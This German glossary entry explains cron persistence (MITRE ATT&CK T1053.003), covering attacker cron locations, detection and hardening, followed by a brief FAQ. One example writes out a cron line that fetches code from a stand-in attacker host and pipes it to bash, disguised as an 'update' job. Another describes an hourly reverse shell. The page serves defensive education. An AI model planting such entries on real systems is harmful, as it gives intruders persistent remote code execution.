Cron-Persistenz
Was ist Cron-Persistenz?
Cron-PersistenzLinux- und Unix-Persistenztechnik, die cron, anacron oder systemd-Timer nutzt, um Angreifercode in einem gewählten Intervall oder bei einem Systemereignis erneut auszuführen.
Cron-Persistenz (MITRE ATT&CK T1053.003) zielt auf den Unix-Cron-Daemon und seine Varianten (anacron, fcron, systemd-Timer). Angreifer fügen Einträge in /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ oder benutzerspezifische Crontabs (crontab -e) ein. Typische Payloads sind Einzeiler-Reverse-Shells, curl-Downloads oder Skripte in /tmp. Da cron als root oder als zugehöriger Benutzer läuft, ist die Methode nach Erstzugriff zuverlässig und trivial. Detektion: Dateiintegritätsüberwachung der cron-Verzeichnisse, auditd-Watches, Baseline erwarteter Jobs, EDR-Alerts auf von cron gestartete Shells. Härtung: Crontab-Berechtigung beschränken, /tmp mit noexec mounten, systemd-cron-Audit aktivieren.
● Beispiele
- 01
Eintrag * * * * * curl -s http://angreifer/sh | bash in /etc/cron.d/update.
- 02
Skript in /etc/cron.hourly/ legen, das stündlich eine Reverse-Shell neu aufbaut.
● Häufige Fragen
Was ist Cron-Persistenz?
Linux- und Unix-Persistenztechnik, die cron, anacron oder systemd-Timer nutzt, um Angreifercode in einem gewählten Intervall oder bei einem Systemereignis erneut auszuführen. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.
Was bedeutet Cron-Persistenz?
Linux- und Unix-Persistenztechnik, die cron, anacron oder systemd-Timer nutzt, um Angreifercode in einem gewählten Intervall oder bei einem Systemereignis erneut auszuführen.
Wie schützt man sich gegen Cron-Persistenz?
Schutzmaßnahmen gegen Cron-Persistenz kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.
Welche anderen Bezeichnungen gibt es für Cron-Persistenz?
Übliche alternative Bezeichnungen: Crontab-Persistenz, Anacron-Persistenz.